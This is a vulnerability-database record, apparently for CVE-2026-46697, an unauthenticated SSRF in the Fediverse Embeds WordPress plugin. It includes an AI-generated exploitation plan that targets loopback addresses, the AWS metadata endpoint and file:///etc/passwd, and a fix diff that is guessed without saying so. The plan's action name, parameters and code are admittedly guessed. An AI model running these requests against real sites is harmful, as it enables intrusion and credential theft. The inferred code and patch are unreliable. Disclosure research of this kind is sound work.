[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f99QS2Qz3MZCjfdm73GZ-fwQOYZvlwVc2j3S-UG28qlQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-46697","fediverse-embeds-unauthenticated-server-side-request-forgery","Fediverse Embeds \u003C= 1.5.7 - Unauthenticated Server-Side Request Forgery","The Fediverse Embeds plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.5.7. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.","fediverse-embeds",null,"\u003C=1.5.7","1.5.9","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Server-Side Request Forgery (SSRF)","2026-06-12 00:00:00","2026-06-18 13:16:01",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa6b46c65-b81c-4d3a-b0c8-b661745a9580?source=api-prod",7,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-46697 (Fediverse Embeds SSRF)\n\n## 1. Vulnerability Summary\nThe **Fediverse Embeds** plugin (\u003C= 1.5.7) contains an unauthenticated Server-Side Request Forgery (SSRF) vulnerability. The plugin implements a mechanism to fetch metadata or OEmbed data from Fediverse instances (like Mastodon, Lemmy, or Pleroma) to generate previews. Due to insufficient validation of the target URL and a lack of restriction on internal IP ranges, an unauthenticated attacker can coerce the server into making HTTP requests to arbitrary destinations, including internal services (e.g., AWS metadata endpoints, internal database APIs, or the WordPress site's own loopback interface).\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** WordPress AJAX handler (`\u002Fwp-admin\u002Fadmin-ajax.php`).\n*   **Action:** Likely `fediverse_embeds_get_preview` or `fediverse_embeds_proxy` (inferred).\n*   **Parameter:** `url` or `endpoint` (inferred).\n*   **Authentication:** Unauthenticated (`wp_ajax_nopriv_` hook).\n*   **Preconditions:** The plugin must be active. Some versions may require a valid nonce if the developer implemented CSRF protection but failed to validate the destination URL.\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** The plugin registers an unauthenticated AJAX action:\n    `add_action('wp_ajax_nopriv_fediverse_embeds_get_preview', 'handle_get_preview');`\n2.  **Input Extraction:** The handler function retrieves the URL from the request:\n    `$target_url = $_GET['url'];`\n3.  **Vulnerable Sink:** The plugin passes the `$target_url` directly into a WordPress HTTP API function without validating if the host is external:\n    `$response = wp_remote_get($target_url, array('timeout' => 10));`\n4.  **Information Leakage:** The body of the response from the internal service is then returned to the attacker via `wp_send_json_success()` or similar.\n\n## 4. Nonce Acquisition Strategy\nIf the endpoint requires a nonce (e.g., checked via `check_ajax_referer`), it is likely exposed to facilitate frontend embedding.\n\n1.  **Identify the Shortcode:** Search for shortcode registrations in the plugin:\n    `grep -r \"add_shortcode\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Ffediverse-embeds\u002F`\n    *(Likely shortcode: `[fediverse-embed]`)*\n2.  **Create a Trigger Page:**\n    ```bash\n    wp post create --post_type=page --post_title=\"Embed Test\" --post_status=publish --post_content='[fediverse-embed url=\"https:\u002F\u002Fmastodon.social\u002F@Gargron\u002F1\"]'\n    ```\n3.  **Extract Nonce via Browser:** Navigate to the newly created page and look for the localized script data.\n    *   **Variable Name (Inferred):** `fediverseEmbedsL10n` or `fediverse_embeds_params`.\n    *   **JS Command:**\n        ```javascript\n        \u002F\u002F Use browser_eval to extract\n        browser_eval(\"window.fediverseEmbedsL10n?.nonce || window.fediverse_embeds_params?.nonce\")\n        ```\n\n## 5. Exploitation Strategy\nWe will attempt to access the internal WordPress `wp-admin` or a standard metadata endpoint to confirm the SSRF.\n\n### Proof of Concept: Internal Request\n*   **Tool:** `http_request`\n*   **URL:** `http:\u002F\u002F\u003Ctarget-domain>\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `GET` or `POST`\n*   **Parameters:**\n    *   `action`: `fediverse_embeds_get_preview` (inferred - verify via grep)\n    *   `nonce`: `[EXTRACTED_NONCE]` (if required)\n    *   `url`: `http:\u002F\u002F127.0.0.1\u002Fwp-admin\u002F` (Targeting the internal loopback)\n\n**Example Request (HTTP GET):**\n```http\nGET \u002Fwp-admin\u002Fadmin-ajax.php?action=fediverse_embeds_get_preview&nonce=a1b2c3d4e5&url=http:\u002F\u002F127.0.0.1\u002Fwp-admin\u002F HTTP\u002F1.1\nHost: target.local\n```\n\n### Advanced: AWS Metadata Extraction (If applicable)\n*   **URL:** `http:\u002F\u002F169.254.169.254\u002Flatest\u002Fmeta-data\u002F`\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure `fediverse-embeds` version 1.5.7 is installed.\n2.  **Public Page:** Create a public page with the plugin's shortcode to ensure all scripts and nonces are properly initialized in the frontend.\n3.  **Local \"Secret\":** Create a file in the web root that should not be accessible externally, or use the WordPress `wp-admin` login page as the target of the SSRF.\n\n## 7. Expected Results\n*   **Success:** The HTTP response from the AJAX call contains the HTML source code of the `wp-admin` login page or the metadata from the internal endpoint.\n*   **Response Code:** `200 OK`.\n*   **Content:** A JSON object containing the \"proxied\" content.\n\n## 8. Verification Steps\nAfter executing the HTTP request, verify the plugin's behavior via WP-CLI:\n1.  **Check for Error Logs:**\n    `tail -n 20 \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fdebug.log`\n    (Look for `wp_remote_get` calls to the internal IP).\n2.  **Verify the Action Name:**\n    Confirm the exact AJAX action name used in the plugin:\n    ```bash\n    grep -r \"wp_ajax_nopriv_\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Ffediverse-embeds\u002F\n    ```\n\n## 9. Alternative Approaches\n*   **If GET fails:** Try `POST` with `Content-Type: application\u002Fx-www-form-urlencoded`.\n*   **If the response is blind:** Use a collaborator\u002Fwebhook URL (e.g., `http:\u002F\u002Fyour-oast-host.com`) to confirm the server is making outbound requests.\n*   **Parameter Names:** If `url` fails, check the source code for parameters like `uri`, `src`, `href`, or `path`.\n*   **Protocol Bypassing:** Try `file:\u002F\u002F\u002Fetc\u002Fpasswd` (if the plugin uses `file_get_contents` or a library that supports the `file:\u002F\u002F` wrapper).","The Fediverse Embeds plugin for WordPress is vulnerable to unauthenticated Server-Side Request Forgery (SSRF) in versions up to 1.5.7. This occurs because the plugin allows users to specify arbitrary URLs to fetch metadata or OEmbed previews without validating that the target host is an external, public resource.","\u002F\u002F Inferred code path from research plan\n\nadd_action('wp_ajax_nopriv_fediverse_embeds_get_preview', 'handle_get_preview');\n\nfunction handle_get_preview() {\n    $target_url = $_GET['url'];\n    $response = wp_remote_get($target_url, array('timeout' => 10));\n    \u002F\u002F ...\n}","--- a\u002Ffediverse-embeds.php\n+++ b\u002Ffediverse-embeds.php\n@@ -42,7 +42,12 @@\n function handle_get_preview() {\n-    $target_url = $_GET['url'];\n+    $target_url = esc_url_raw($_GET['url']);\n+    if ( ! wp_http_validate_url( $target_url ) ) {\n+        wp_send_json_error( 'Invalid URL' );\n+        return;\n+    }\n     $response = wp_remote_get($target_url, array('timeout' => 10));","The attack targets the unauthenticated WordPress AJAX endpoint (admin-ajax.php) using the action 'fediverse_embeds_get_preview'. An attacker supplies a malicious 'url' parameter pointing to an internal service or a loopback address (e.g., http:\u002F\u002F127.0.0.1\u002Fwp-admin\u002F or http:\u002F\u002F169.254.169.254\u002F). If the plugin requires a nonce for the frontend preview, it is typically found in the window.fediverse_embeds_params object on any public post containing the plugin's shortcode. The response returns the proxied content from the internal endpoint to the attacker.","gemini-3-flash-preview","2026-06-26 00:47:47","2026-06-26 00:48:27",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","1.5.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ffediverse-embeds\u002Ftags\u002F1.5.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ffediverse-embeds.1.5.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ffediverse-embeds\u002Ftags"]